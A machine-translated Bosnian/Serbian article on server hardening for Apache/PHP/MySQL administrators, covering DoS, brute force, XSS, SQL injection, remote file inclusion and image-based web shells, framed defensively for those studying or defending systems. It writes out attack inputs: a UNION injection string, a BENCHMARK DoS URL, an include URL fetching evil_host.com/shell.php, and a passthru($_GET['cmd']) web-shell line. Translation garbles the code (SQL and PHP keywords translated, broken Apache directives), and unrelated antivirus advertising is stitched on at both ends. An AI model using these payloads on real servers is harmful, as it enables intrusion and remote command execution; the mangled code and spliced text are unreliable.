Primena antivirusne zaštite preko Kaspersky Security Center-a. Konfigurisanje antivirusne zaštite Previše vremena


U ovom članku želim sabrati neke vrste napada na servere i načine zaštite servera od hakera. Mnogo je knjiga i članaka napisano na temu sigurnosti. Akcenat ovog članka je na osnovnim greškama administratora i rješenjima za njihovo otklanjanje. Nakon čitanja ovog članka i provjere vlastitog servera, administrator također neće moći mirno spavati, može samo reći da sam prošao "minimum kandidata".

Zapamtite administratore tri poslovice,
Ne! bolje ih odštampajte i objesite na svom radnom mjestu ispred vaših očiju:
"Sigurnost je proces",
"Kad admin nema šta da radi, on se bavi obezbeđenjem",
"Sigurnost definira najslabija karika"
Članak je namenjen *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) administratorima i zaštiti servera od daljinskih napada, za ostale administratore, nadam se da će članak biti hrana za razmišljanje.
Različite knjige imaju različite klasifikacije hakerskih napada, ja ću uvesti svoju podjelu na dvije uslovne klase SVIH napada, razgrupisati ih:

  • Napad na servise koji su ranjivi i dostupni putem interneta

Da biste razumjeli moju podjelu, zamislite da postoji izmišljena skripta koja daljinski napada Apache na portu 80 i, kao rezultat napada, Apache se gasi i vi ostajete bez svoje stranice, jer nema ko da izda web stranice. Vaš sendmail mail server je poslao 1000 znakova umjesto kratkog korisničkog imena kao parametar VRFY-u, sendmail nije očekivao da će se to dogoditi i zatvoren je ostavljajući vas bez pošte. Opšte značenje napada ove uslovne klase je da se neka ranjivost aplikacije iskorištava. A postoje tri načina -

  • path1) aplikacija će se srušiti i usluga neće biti dostupna, DoS situacija;
  • put 2) aplikacija će početi da hvata resurse i, nakon što ih iscrpi, izvršiće DoS;
  • path3) aplikacija će dobiti shellcode i izvršit će se napadačev kod;

Sve su to napadi na servis (stavka 1) i tretiraju se na samo jedan način: administrator odmah sazna od programera o prisutnosti ranjivosti i ažurira ovaj program.

Napad na tačku 2 je kada dinamička usluga implementirana u nekom programskom jeziku dozvoljava primanje parametara i izvršava ih bez provjere. Na primjer, koristeći pretraživač, napadač, indeksirajući Apache stranicu, traži ranjivosti na samoj stranici i iskorištavajući ih, dobija ono što želi. Napisan u Tcl-u, bot za moderiranje kanala IRC servera prima zahtjeve od korisnika (broj novog vica, datuma dana za prikaz vremena) i hakera, rekreirajući rad programskog koda bota (obrnuti inženjering ), konstruiše zahteve koje autor bota nije uzeo u obzir.

Pitaj kako je? onda vam je ovaj članak svakako potreban. Na ovaj ili onaj način, odmah ispod sve će biti obojeno.

Napad na ranjive servise i sam server

U ovaj odeljak uključio sam sve napade čiji uticaj pada na sistem i usluge. Često su takvi napadi mogući zbog grešaka u implementaciji programa, kao što je prekoračenje bafera (buffer overflow). Ukratko, to izgleda ovako, recimo da u loše napisanom ftp serveru postoji niz (bafer) za korisničko ime za određeni broj karaktera (npr. 10), a takav ftp server prima 100 karaktera od bolesnog -wisher, ako takva situacija nije provjerena u kodu ftp servera, dolazi do prelivanja bafera.

Dakle, šta je lokalni buffer overflow koristan za hakere? Moguće je prepisati povratnu adresu zlonamjernim kodom. Udaljeno, ovo vam omogućava da izvršite proizvoljni kod na ciljnom sistemu, lokalno, ako se program izvodi kao root, to će vam omogućiti da dobijete privilegije sistemskog administratora. Kod koji uzrokuje prelijevanje bafera i izvodi akcije za hakera naziva se shell Pisanje shellcode-a nije lak zadatak i zahtijeva poznavanje asemblerskog jezika od hakera, što podrazumijeva profesionalnost u ovoj oblasti.

Zaštita od napada na ranjive servise i sam server

  • Ažuriraj. Potrebno je naučiti kako ažurirati cijeli sistem i samim tim biti u mogućnosti
    "izgradite svijet i jezgro" za *nix, ažurirajte putem sistema Linux paketa i moći ćete kliknuti na dugme Ažuriraj u Windows Update za licencirani MS Windows. FreeBSD administratori moraju biti u mogućnosti da instaliraju softver koristeći portove. Na ovaj način ćete ploviti sa programerima, a ne protiv njih.

    Administratori MS Windows-a moraju se naviknuti i češće koristiti MSI format distribucije, koji Microsoft toplo preporučuje i podržava ažuriranje starog paketa novim. Šta god da radite na svom serveru, zapitajte se da li postoji nova verzija ovog programa, koliko je lako ažurirati je? Morate kreirati rješenje nad kojim imate potpunu kontrolu, da, postoje projekti sa vlastitim razvojem ili zakrpama, ali ako vaš razvoj zahtijeva zamrzavanje aplikacija koje su vam potrebne na određenoj verziji i ne možete primijeniti svoje zakrpe na novi sistem - takvo rješenje NE VRIJEDI!

    Ovdje ću napraviti lirsku digresiju i reći vam kako sam se morao slomiti. Nakon što pročitate članke na Internetu koji obično počinju ovako, "preuzmite izvor i stavite ga za instalaciju". Dakle, šta je sljedeće? Kako ćete instalirati novu verziju? Zadržite staru verziju kako biste mogli (de)instalirati u njoj? I u novoj make instalaciji opet? Ova pitanja je postavio moj prijatelj Dmitry Dubrovin kada smo počeli učiti FreeBSD. Počeo sam shvaćati da je bio u pravu, i barem za Free, ovaj put nije prikladan, a ne slijedeći put FreeBSD programera, samo sam sebi otežao stvari.

    Sada, nakon savladavanja FreeBSD-a, kada nekoliko komandi preuzme nove izvore za Free kernel i cijeli sistem, onda se par komandi kreira novi svijet i kernel, a zatim se portovi i aplikacije u sistemu ažuriraju, počinjete da shvatate moć * nix sistema. Teško je prenijeti ponos koji osjećate kada nadogradite server sa FreeBSD-om sa stare grane na trenutnu, ponovo izgradite sistemski svijet, kada se sistem kompajlira iz novih izvora (izgleda kao da se Munchauzen vukao za kosu) i sve koji je radio prije nadogradnje također radi "bez datoteke".

    Kao što ste već shvatili, morate se pretplatiti na sigurnosne mailing liste od programera softvera koji podržava vaše poslovanje i povremeno se ažurirati. Obnova svega i svačega mora se usavršiti i staviti na šine.

  • Sigurnosno podešavanje. Većina serverskih operativnih sistema nije po defaultu dovoljno konfigurisana za rad u oštrom "hemijskom" okruženju Interneta. Da hakeri "ne varaju" na vašem serveru, potrebno je izvršiti sigurnosno podešavanje, odnosno pročitati preporuke proizvođača operativnog sistema o sigurnosti. Administratori *nix sistema mogu pozvati čovjeka sigurnosti i, nakon čitanja savjeta programera, učiniti bajku stvarnošću. Ali bez obzira na operativni sistem, morate pažljivo testirati rad servera i usluga nakon sigurnosnog podešavanja.
  • firewall. Konfigurisani zaštitni zid koji ste lično proverili pomoću nmap port skenera i skenera ranjivosti, ako postoji izlaz iz ovih programa, da li svi razumete šta je u pitanju? Kada postavljate zaštitni zid, zapamtite da postoje načini da se zaobiđu njegova pravila. Na primjer, postoji lokalna mreža zaštićena firewall-om, postavljanjem oznake zabrane fragmentacije paketa moguće je, u određenim situacijama, doći do odredišta u lokalnoj mreži. Ili uobičajena greška administratora, pretjerano povjerenje u odlazne pakete vlastitog servera.

    Zamislite realna situacija, neprijateljski kod pokušava da pokrene vezu sa hostom hakera hosta, a vi imate pravilo zaštitnog zida "sve je dozvoljeno od mene na Internet". Kada sastavljate pravila zaštitnog zida, morate u potpunosti razumjeti cijelu sliku mrežne komunikacije vaših usluga između njih i udaljenih klijenata.

  • Sistem za detekciju upada. Vatrozid se može zamisliti kao kameni zidovi u blizini viteškog zamka. Jednom podignuto i sjediti unutra - suho i udobno. Ali šta ako neko već testira snagu zidova iz topa? Možda već trebate pogledati iz zamka i nagomilati nekoga? Da biste znali šta se dešava iza zidova zamka, onih vani, morate imati sistem za otkrivanje upada (IDS) na serveru. Ako imate takav sistem baziran na paketu koji vam se sviđa, onda ako neko počne pucati iz nmap pištolja, tada ćete biti svjesni, a i napadač će biti svjestan "šta znate".
  • Analiza nestandardnih situacija. U brojnim logovima u sistemu često trepere natpisi "greška: nije otvorena datoteka /etc/passwd" ili "pristup odbijen". To su mala zvona koja zvone o nekorektno konfigurisanoj aplikaciji koja ne može da pročita nešto, negde, ili možda nije zvono, već alarm koji alarmira hakera koji je na pola puta.

    U svakom slučaju, administrator bi trebao biti svjestan takvih stvari. Kako bi se olakšao rad administratora, kreirani su programi koji će analizirati logove za pojavu zanimljivih fraza i poslati izvještaj administratoru poštom. Nemojte prezirati takvu priliku, takvi programi su uporedivi sa čuvarima koji provjeravaju na pouzdanom putu, ali da li se svi ponašaju kako je propisano?

  • Uklonite verzije softvera. Uklonite banere sa svojih usluga. Ne, ne one banere koje prikazujete na svom sajtu, već one linije koje vaši programi daju u pozdravima prilikom povezivanja ili u izlazu greške. Nema potrebe da blistate sa verzijama vaših programa, hakeri pretražuju internet u potrazi za dostupnim programima koji iskorištavaju ovu ili onu ranjivost (exploits - exploit) po verzijama.

    Ovdje nema jedinstvenog rješenja, na primjer, ako instalirate određeni program sa portova, onda nemojte pisati make install clean, pa će bez vas sve biti preuzeto, kompajlirano i instalirano. Bolje je napraviti dohvat; napraviti ekstrakt; zatim idite u poddirektorijum fajlova i tamo možete ispraviti verziju programa u izvorima ili je proslediti kao drugu i onda samo učiniti instalaciju čistom.

    Apache je veoma informativan i nije na mestu i još uvek blista sa verzijama sistema, PHP, Perl, OpenSSL. Sramota je onemogućena navođenjem direktiva u httpd.conf ServerSignature Off ServerTokens Prod. Na internetu možete pronaći pomoć za zamjenu banera bilo kojim programom. Cilj je isti - oduzeti napadaču vrijedne informacije. Gledajući svoju listu usluga dostupnih na Internetu, zapitajte se da li daje previše informacija o sebi i informacijama koje pohranjuje.

    Na primjer, povezivanje DNS servera može dozvoliti "transfer zone" i vaši računari sa svojim IP i imenima domena će biti dostupni svima, što je loše. Provjerite svoj server raznim skenerima i pažljivo pročitajte njihove rezultate. Prilikom zamjene programskog banera savjetujem vam da ubacite ne nasumični tekst, već upozorenje o odgovornosti i da se radnje evidentiraju. Pošto je bilo incidenata kada je haker pušten u sudnicu, jer je na hakovanom FTP serveru stajao natpis "Dobro došli! Dobro došli!".

  • Pravilo minimalnih zahtjeva. Minimizirajte dostupne usluge za Internet. Onemogućite ono što vam nije potrebno, jer ne možete hakovati ono što je onemogućeno. Uobičajena greška, na primjer, kada je MySQL server, uparen sa Apache-om na istoj mašini, konfigurisan da bude dostupan daljinski na svom standardnom portu 3306. Zašto? Dajte naredbu netstat -na | grep SLUŠAJTE i dajte sebi odgovor: da li znate koji programi koriste koji interfejs i koji port? Da li imate kontrolu? Pa ako je tako.
  • Mnogo jakih i različitih lozinki. Često u video snimcima o hakiranju ili hakerskim pričama o hakiranju treperi fraza "dobro je da je administrator imao jednu lozinku za admin panel, koja je išla do ssh i ftp". Nadam se da se ne radi o tebi. Otuda i pravilo: lozinke za različite servise moraju biti različite i dugačke najmanje 16 znakova. Neka se zapišu na komad papira ako se plašite da zaboravite (na ovom mestu me ubiju stručnjaci za bezbednost), ali ovo je bolje nego da vam daljinski napadač dešifruje lozinku za nekoliko minuta, pošto je mala dužina lozinka i sličnost sa riječničkom riječi su to omogućili.

    Različite lozinke za različite servise je lako napraviti ako se servisi autoriziraju ne kao sistemski korisnici u /etc/passwd bazi podataka, već kao virtuelne u svojim planarnim ili DBMS bazama podataka. Nemojte čuvati lozinke na serverima u datoteci password.txt za sve resurse kojima vi, kao administrator, imate pristup.

  • Ograničenje. Sve vaše usluge na serveru moraju se pokretati sa različitih ograničenih naloga (naloga) i nikada se ne pokrenuti sa root naloga. Vjerujte mi, ako dođu do tačke eskalacije privilegija sa ograničenog naloga na root status (uid=0, gid=0), bićete spašeni odsustvom poznatih rupa u vašem ažuriranom sistemu.

    Usput, mnogi administratori zaboravljaju tako nešto, zašto bi, na primjer, nalozi za pokretanje Apachea i MySQL trebali imati pristup ljusci! Uostalom, ovo se može onemogućiti i umjesto ljuske navesti / bin / false. Pa, iskreno, provjerite na vašim računima programe na vašem serveru za izvještavanje i recite mi ako griješim. U vašim SQL bazama podataka, ograničite naloge na minimalne potrebne privilegije. Nemojte davati privilegije FILE kada se poziva samo SELECT.

  • Svi u zatvor! Naučite kako raditi sa sandbox-om (sandbox) ili zatvorima (zatvorom) i pokretati aplikacije u ovim izoliranim prostorijama, to će otežati hakovanje cijelog servera. Ako koristite virtuelizaciju, tada možete širiti usluge na različite gostujuće operativne sisteme.
  • Slojevita odbrana. Moguće je nešto zabraniti na više načina na različitim mjestima - uradite to. NIKAD ne razmišljaj - zabranio sam to ovdje, tamo zabraniti suvišno.

Saznajte više o napadima na ranjive usluge i sam server.

  • DoS napad (Denial of Service) - napad čiji je cilj ubijanje bilo kojeg ograničenog serverskog resursa (Internet kanal, RAM, procesor, itd. itd.) tako da server ne može služiti legitimnim korisnicima. Slikovito rečeno, zamislite da vas je uljez nazvao kući i ćutao na telefon, i to je trajalo cijelu večer. Bili ste umorni od svega ovoga i isključili ste telefon, a ujutro ste saznali da ste propustili važan poziv od šefa. Evo analogije iz pravi zivot DoS napadi.

    U stvarnom životu DoS često izgleda ovako, zbog greške u programu, upotreba procesora skače i ostaje na 100% dugo vremena, a napadač periodično iskorištava ovu rupu u programu. Loše napisana aplikacija može ostati bez RAM-a. Ili "mail bomba" u obliku jako komprimirane datoteke u arhivi s mnogo znakova [razmak], koju će antivirusni program raspakirati radi provjere i raspakirana ogromna datoteka će preliti particiju tvrdog diska na serveru i / i uzrokovati ponovno pokretanje servera.

    DoS zaštita od napada:

    • Ažuriranje programa kojim se manipuliše radi DoS napada
    • Postavite kvote resursa za račun pod kojim se ovaj program izvodi. *nix sistemi vam omogućavaju da prilagodite procenat upotrebe CPU-a, RAM-a, broja pokrenutih procesa, otvorenih datoteka itd. i tako dalje.
    • Postavite prijavljivanje u program i pokušajte pronaći napadača-lutkara i blokirati ga u firewall-u.
    • Postavite program prema savjetima programera, gurua, prema člancima na internetu, ako se nađete u takvoj situaciji.
  • DDoS (isti DoS, ali ste napadnuti sa nekoliko zombi računara, na čelu sa
    napadač). DDoS je destruktivan i koriste ih samo oni vandali koji imaju krda zombi mašina i koji će tražiti novac da zaustave napad ili nanesu štetu vašem poslovanju kako bi korisnici, a da ne dođu do vašeg servera, otišli kod konkurenta. DDoS napade ne koriste hakeri čiji je cilj da intelektualno hakuju vaš server, da, da, vaš server je "misterija" koju žele da "riješe".

    Kako se zaštititi od DDoS-a? Ako se oslanjate na vlastite snage i sredstva, onda automatizacijom rada skripti možete izdvojiti IP adrese iz raznih dnevnika i unijeti ih u zabranjujuća pravila firewall-a. Tako je, na primjer, autor članka "Ima li života pod DDoS-om?" u časopisu Hacker. Blokirajte mreže napadača u firewall-u, šteta od DDoS-a se može smanjiti ako pročitate članke o konfiguriranju vaših programa i slijedite ove upute. mnogi članci o tome kako ga konfigurirati da minimizira štetu od DDoS-a.

    Zaštita od DDoS napada:

    • Ako je DDoS usmjeren na aplikaciju, pokušajte u logovima pronaći razliku između napadača i legitimnih korisnika i automatizacijom pomoću skripte unesite ga u pravila firewall-a u deny
    • Ako je DDoS usmjeren na sistem (na primjer, napad na ICMP protokol), automatizacijom pomoću skripte, dodajte ga pravilima zaštitnog zida u zabrani
    • Postavite kvote resursa za račun pod kojim se ovaj program izvodi. * nix sistemi vam omogućavaju da konfigurišete procenat korišćenja CPU-a, RAM memorije, broj pokrenutih procesa, otvorenih datoteka itd.
    • Postavite program prema savjetima programera, gurua, prema člancima na internetu, ako se nađete u takvoj situaciji
    • Kontaktirajte svog upstream provajdera da vam pomogne na bilo koji način. Napišite žalbu na abuse@host_of_networks_from_the_attack_domain. Ovo će pomoći da se djelomično uništi mreža napadača, neka pretrpi štetu, to ga košta novca. Doživite moralnu satisfakciju.
    • Pogledajte mod_security za Apache, to je odličan alat koji će vam pomoći u nekim situacijama.
  • Bruteforce napad lozinkom. Ovdje rupe u programima nisu krive, oni samo otprilike biraju par login/lozinke. Oni koji su napustili server sa konfigurisanim ssh-om, ali su zaboravili da ograniče pristup preko ssh-a sa određenih IP-ova i sa određenim prijavama (direktiva u ssh_config AllowUser), mora da su u zapisnicima videli pokušaje brutalne upotrebe lozinke mash:password_machine.

    Bruteforce zaštita lozinkom:

    • Ograničite broj neuspješnih pokušaja prijave/lozinke
    • Ako aplikacija dopušta, postavite povećanje vremena prije novog pokušaja prijave/lozinke.
    • Ako s aplikacijom treba raditi uski krug ljudi, kreirajte takvo pravilo i ograničite ga na

Napad kroz dinamički sadržaj usluge

Ova vrsta napada se često dešava na gomili Apache + (PHP | PERL) + (MySQL | PostgreSQL) za *nix svijet i IIS + ASP + Microsoft SQL Server za svijet MS Windows koristeći jednostavan pretraživač, ali ovo je samo poseban slučaj, koji se samo češće koristi zbog popularnosti weba. U ovom paketu programski jezici su ASP, PHP, Perl, SQL, tako da će ih hakeri često koristiti za kompajliranje svojih destruktivnih dizajna.

ALI najvažnije je razumjeti da takvi ligamenti usluga + dinamički sadržaj na njima ima ih mnogo u programskim jezicima i stoga su svi pod oružjem hakera. Na primjer, evo nepotpune liste:

  • Web server + CGI skripte
  • Drevna veza koja se više ne koristi - Apache + PHF (naime P H F) skripte
  • IIS + ColdFusion Application Server
  • SSI mehanizam (uključuje serversku stranu)

Dalje ćemo pričati uglavnom o web hakovima, ali ne zaboravite da sve što je dolje opisano vrijedi za druge pakete usluga + dinamički sadržaj. Reči su različite, ali suština je ista. Danas hakeri napadaju web pretraživačem, sutra R klijentom protiv servisa Z. Web server, sam povezan sa bazama podataka i brojnim programskim jezicima, postao je platforma za napade ove vrste.

Smisao svih napada ove vrste je pokušati ispitati web stranicu koristeći pretraživač kako bi pronašli greške u skriptama koje služe dinamičkom sadržaju (sadržaju) stranice.

Otuda zaključak - hakiranje sajta putem napada na web, na kojem postoje samo statične html stranice koje se samo odnose jedna na drugu, je NEMOGUĆE. Napadi preko vaše web stranice nastali su kada su ljudi željeli više interaktivnosti i dodavali je putem programskih jezika i baza podataka.

Hakeri koji surfuju sajtom obraćaju posebnu pažnju na skripte kojima se prosleđuje bilo koji parametar. Ali šta ako autor skripte ne provjeri šta je tačno prosleđeno kao vrednost parametra?

Opća rješenja za administratora od napada na dinamički sadržaj servisa (web stranica kao poseban slučaj)

  • Ažuriraj. Već smo pričali o tome, ali ako koristite razvojne programe trećih strana (mahine foruma, galerija, chatova, itd.), tada ćete dobiti izvještaje o ranjivostima i rupama zakrpe. Mišljenje hakera je da ako portal radi sa finansijama i njihovim prometom, onda nije poželjno da takav portal ima tuđe radove, osim svoje. Naravno, podrazumeva se da su razvoj sopstvenih motora za sajt pisali koderi koji znaju kako da bezbedno programiraju i razumeju pretnje na Internetu.
  • Budite nestandardni. U mnogim hakerskim uslužnim programima, baze podataka ranjivosti, forum/, galerija/, slike/ putanje često trepere. Veoma udobno! Poznaj admina, pola njih će se obrijati i pljunuti po tvojoj stranici kada se tvoj sajt ne nalazi na /usr/www, a tvoj admin nije site.com/admin. Suština je, ako niste standardni, onda je ovo dodatni krak u točkovima hakera koji napada vašu stranicu. On će morati dodati/ispraviti u ručnu bazu podataka/skriptu. Ali da li je haker uvijek u stanju ili voljan to učiniti? Mladi hakeri "skriptaški klinci" će sigurno biti uplašeni. Na primjer, PHP sigurnosni savjeti

    # Neka PHP kod izgleda kao druge vrste koda
    AddType application/x-httpd-php .asp .py .pl
    # Neka PHP kod izgleda kao kodovi nepoznatog tipa
    AddType application/x-httpd-php .bop .foo .133t
    # Neka PHP kod izgleda kao html
    AddType application/x-httpd-php .html .htm

    Ovaj oblik sigurnosti za PHP kroz skrivanje ima nekoliko nedostataka uz malu cijenu. Sami hakeri, opisujući svoje hakove, pišu da preuzimaju isti softver koji se nalazi na vašem serveru sa web stranice programera i gledaju s kojim zadanim imenima tablica / stazama / ovaj ili onaj motor radi. Opšte značenje nestandardnog je odgoditi proces hakovanja kako haker ne bi imao "blickrig", a što više vuče, veća je vjerovatnoća da će biti otkriven.

  • Uklonite verzije motora i skripti sa stranice. Ovo je vrijedna informacija koju napadaču treba lišiti saznanja o verziji koju traži. rješenja po sistemu ključ u ruke za hakovanje. Učinite to tako da vaše skripte ne prikazuju greške na greškama korisne informacije, kao što su: putanja do skripte u kojoj je došlo do greške (problem "otkrivanja putanje") i izlaz same greške.
  • Razmotrite potrebu za .htaccess. Prisustvo .htaccess datoteka znači da možete poništiti svoje opcije postavljene u glavnoj Apache konfiguraciji, vjerujte mi, hakeri će upravo to učiniti. Ako onemogućite upotrebu .htaccess sa "AllowOverride None" direktivom, tada ćete dobiti prednost u performansama za Apache, jer neće pregledavati sve direktorije na putu do web stranice na svaki zahtjev i povećati sigurnost Apache web server.

Više o napadima na dinamički sadržaj (web stranica kao poseban slučaj)

  • XSS (Cross Site Scripting).
    Skriptiranje na više lokacija naziva se XSS, a ne CSS, pošto je CSS rani akronim za "Cascading Style Sheets". XSS napadi nisu usmjereni protiv servera, već protiv korisnika tog servera. Ali admin ne treba da se raduje! XSS napad izgleda ovako, stranica ima polja koja se mogu uređivati ​​na web stranici ili parametre skripte koji nisu filtrirani na konstrukciji obrasca<, >, javascript.

    Haker dodaje kod u programskom jeziku na strani klijenta, obično Java i VBScript, u ​​polja koja se mogu uređivati, i ovaj kod postaje dio HTML stranice. Kada korisnik posjeti takvu stranicu, njegov pretraživač analizira stranicu i izvršava ovaj kod.
    Šta hakeri rade sa XSS-om?

    • Krađa kolačića (kolačića, kolačića) - ove tekstualne datoteke pohranjuju informacije koje server "stavi" korisniku radi njegove naknadne identifikacije. U primjeru, ako kreirate test.html datoteku sa ovim sadržajem (napišite je sami), onda kada se pokrene u pretraživaču, ona će ispisati XSS.
      Poštovani administratore, imao sam grešku prilikom posjete stranici
      Upomoć

      Ali možete napisati skriptu u Javi i ozbiljnije. Obično se takve skripte pišu na web-poštu administratora i, koristeći društveni inženjering, pokušavaju ga natjerati da pročita poruku kako bi dobio svoje kolačiće.

      Ako u kolačićima nema veze na IP adresu i dodatne sigurnosne mjere, oni zamjenjuju svoje kolačiće s administratorskim kolačićima i pokušavaju ući u admin panel koji ne provjerava login i lozinku i identificira ljude samo pomoću kolačića.

    • Deface stranice (deface - zamjena početne stranice stranice, najčešće index.html)
    • Trojanizacija udaljenog korisnika. Odabiru se novi eksploati za pretraživače korisnika i kada uđu na ranjivu stranicu, pokušava se zaraziti računar trojancem. Ako korisnik ima instaliran antivirus sa svježim bazama podataka, tada će ukazati na pojavu trojanca u sistemu. I vaša stranica će pasti u očima korisnika, možda vam više neće doći.
    • DoS. Uz veliki broj posetilaca, skripta će dodatno zahtevati još drugih stranica sa vašeg servera ili sa drugog, neko može imati DoS.

    Rješenje problema:

    • Da biste blokirali pisanje html oznaka u bazu podataka iz polja za unos, koristite konstrukcije poput htmlspecialchars za PHP, koje će zamijeniti< на <, >na >, & na & i tako dalje
      primjer,

      $comment = htmlspecialchars($comment, ENT_QUOTES);
      $query = "ubaci u knjigu gostiju
      (ime, lokacija, email, url, komentar) vrijednosti
      ("$name", "$location", "$email", "$url", "$comment")";
      mysql_query($query) ili die(mysql_error());

    • Provjerite i filtrirajte u svojim skriptama sve parametre koje korisnik unese i koji se prosljeđuju skripti kroz adresnu traku. Naučite kako pravilno koristiti regularne izraze za raščlanjivanje dolaznih podataka. Za svoj programski jezik pronađite materijal koji vas uči kako sigurno kodirati.
    • Ako želite da koristite tehnologiju kolačića na svojoj web stranici, pročitajte naše Sigurnosne prakse kolačića. Ograničite njihove radnje u vremenu i IP adresama.
    • Kao administrator, budite oprezni kada vas društveni inženjering prevari. Ne zaboravite na sigurnost ličnog računara iza vašeg klijentskog računara.
  • SQL injekcija. SQL injekcija.
    Ova bolest znači da se neprovjereni parametar zamjenjuje u SQL upit koji se pojavljuje u skripti. Haker pronalazi skripte koje pate od SQL injekcije na jednostavan način, citat site.com/view.php?id=1" se dostavlja vrijednosti parametra, ili se numerički parametar modificira kao ovaj site.com/view.php? id=2-1.

    Ako zamijenjeni citat uzrokuje "grešku" (mnogo poruka da se taj i taj zahtjev ne izvršava u tom i tom skriptu duž takve putanje), onda je takva skripta kandidat za dalje pumpanje. Često napadači koriste Google hak, tražeći od pretraživača nešto poput ovog "site: www.victim.ru Upozorenje". Google pretraživač će vratiti netačne skripte na vašoj web stranici, toliko drevne da ih je Google pauk već dugo indeksirao .

    Kod koji ne provjerava vrijednost i pati od SQL injekcije

    $id = $_REQUEST["id"];
    $result = mysql_query("IZABERI naslov, tekst, datenews, autora IZ `vijesti` GDJE `id`="$id"");

    Sada zamislite da ćete umjesto broja biti zamijenjeni "-1 union select null/*" (bez navodnika) i tada će se vaš upit pretvoriti u

    ODABERITE naslov, tekst, datum vijesti, autora IZ `vijesti` GDJE `id`="-1 unija odaberite null/*"

    Odnosno, haker želi da se njegov zahtjev izvrši kao dodatak vašem zahtjevu, u kombinaciji s vašim korištenjem sindikalne direktive. A onda će haker pokušati postaviti druge upite i, s obzirom na moć SQL jezika, to ne sluti na dobro za administratora. Od defacea (deface - zamjena početne stranice stranice) do dobijanja root prava na vašem serveru. Haker takođe može da izvrši DoS napad zahvaljujući SQL injekciji: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) par takvih zahteva i server je na 100% CPU dugo opterećenje.

    Zaštita od SQL injekcije:

    • Široko koristite funkcije SQL Servera kao što su prikazi i pohranjene procedure. Ovo će ograničiti neovlašteni pristup bazi podataka.
    • Prije prosljeđivanja parametra zahtjevu, mora se provjeriti tip (za PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() i is_integer()) i najmanje , citirano pomoću konstrukcije tipa addslashes za PHP.
    • Sve skripte rade sa bazom podataka sa nekog naloga baze podataka, uklonite sve privilegije sa ovog naloga koje nisu potrebne za rad. Hakeri često koriste MySQL komandu (MySQL je uzet kao primjer, ovo se odnosi na bilo koji SQL server) "LOAD DATA INFILE" za čitanje datoteka koje su im potrebne sa servera i čitljivog naloga pod kojim MySQL radi. Otuda zaključak, onemogućite nepotrebne privilegije za vaše skripte, kao što je FILE, koje su potrebne za korištenje naredbe LOAD DATA INFILE. Za osnovu treba uzeti princip „osnovnog minimuma“.
    • Sistemski nalog pod kojim radi SQL server ne bi trebalo da ima pristup stranicama sajta i sistemskim datotekama servera.
  • Povezivanje fajlova. Uključi fajl. Recimo da postoji stranica site.com/getnews.php?file=190607, ali autor skripte, koristeći uključivanje, povezuje stranicu bez provjera.

    $file = $_REQUEST["fajl"];
    uključi ($file.".html");

    Haker će zamijeniti evil_host.com/shell.php umjesto 190607 i tada će cijela adresna traka hakerskog pretraživača izgledati ovako site.com/postnews.php?file=evil_host.com/shell.php i haker će imati svoju vlastitu web ljusku na vašoj web lokaciji s pravima koja ima Apache.

    Zaštita veze datoteka:

    • Provjerite i filtrirajte u svojim skriptama sve parametre koje korisnik unese i koji se prosljeđuju skripti kroz adresnu traku. Za svoj programski jezik pronađite materijal koji vas uči kako sigurno kodirati.
    • Hakeri zaista vole kada vam programski jezik na sajtu omogućava pokretanje sistemskih komandi. Stoga morate zabraniti pozivanje takvih funkcija u vašem programskom jeziku, ako je to, naravno, moguće. Na primjer, u PHP postavkama moguće je specificirati listu "zabranjenih" funkcija koristeći disable_functions u php.ini.
  • Trojanska slika
    Ako imate mogućnost da otpremite fajlove na server na sajtu, budite spremni da otpremite, na primer, slike avatara. Na slici u JPEG formatu postoji koncept metapodataka (zapamtite gde kamera upisuje informacije prilikom snimanja kadra) i ovi metapodaci će biti upisani

    ";passthru($_GET["cmd"]);echo ""; ?>

    slika će biti preimenovana u avatara.jpg.php kako bi se zaobišla većina provjera proširenja i koristit će site.com/upload_images/avatara.jpg.php?cmd=server_commands

    Trojanska zaštita:

    • Provjerite ekstenziju datoteke ispravno. Čak i ako ispravno obrađujete dozvoljene datoteke, budite spremni da slika iz jpg u php bude preimenovana koristeći drugu ranjivost na vašoj web lokaciji. Provjerite metapodatke na slici pomoću funkcija kao što je exif_read_data() u PHP-u.
    • Spriječite izvršavanje programskih jezika u direktorijima slika pomoću vašeg web servera. Da biste to učinili, pogledajte u konfiguracijskim linijama Apachea kao što su "AddType application/x-httpd-", koje povezuju programske jezike ​​​sa ekstenzijama datoteka i zabranjuju njihovo izvršavanje u direktorijima sa slikama. Za Apache, zabrana izvršavanja PHP jezičkih datoteka će biti konstrukcija


      Naredi odbije, dozvoli
      Odbiti od svih

    • Za svoj programski jezik pronađite materijal koji vas uči kako bezbedno kodirati prilikom obrade slika i ispravnog učitavanja na server.

Lična hvala:

  • prijatelj Alexander Pupyshev aka ris za kritiku i savjet
  • stranica antichat.ru/
  • www.xakep.ru/
  • knjiga Michael Eben, Brian Taiman. FreeBSD administracija: Umijeće balansiranja
  • knjiga Joela Scambraya, Stuarta McClurea, Georgea Kurtza. Tajne hakera: Sigurnost mreže - gotova rješenja. Drugo izdanje

Ostali izvori informacija o zaštiti:

  • FreeBSD man sigurnosna stranica sadrži opis uobičajenih sigurnosnih problema i dobre prakse administracije.
  • Pretplatite se na freebsd-security @ freebsd.org mailing liste. Da biste to uradili, pošaljite email na majordomo @ freebsd.org sa pretplatom na freebsd-security u telu poruke. Na ovoj mailing listi se najviše raspravlja stvarni problemi zaštita.
  • FreeBSD stranica sa sigurnosnim informacijama freebsd.org/security/
  • FreeBSD Security How-To Document
  • Web stranica CERT.org sadrži informacije o ranjivosti ah u zaštiti svih operativnih sistema.
  • Firewalls & Internet Security by William R. Cheswick i Steven M. Bellowin
  • Izgradnja internetskih zaštitnih zidova, 2. izdanje Brenta Chapmana i Elizabeth Zwicky

Ishod:
Nadam se da vam je članak pomogao da zajedno sagledate sve probleme, sada administrator treba da čita o sigurnosti računala, bazama podataka, web serverima, programskim jezicima iz dodatnih izvora. Sumirajući ukratko članak, morate biti svjesni vijesti o izdavanju sigurnosnih problema, ažurirati i provjeriti sve ulazne podatke za ispravnost u vašem razvoju.
Neka sila bude s vama!

Kako bi softverske usluge kompanije radile uspješno bez kvarova, kvalitetno instalacija, i konfigurisanje antivirusne zaštite. Danas nijedna kompanija ne može bez upotrebe interneta za računovodstvo, poslovnu korespondenciju, izvještavanje. CRM sistem je veoma popularan, ali kvalitet njegovog rada direktno zavisi od povezanosti sa globalnom mrežom.

Prednosti instalacije softver za zaštitu od virusa

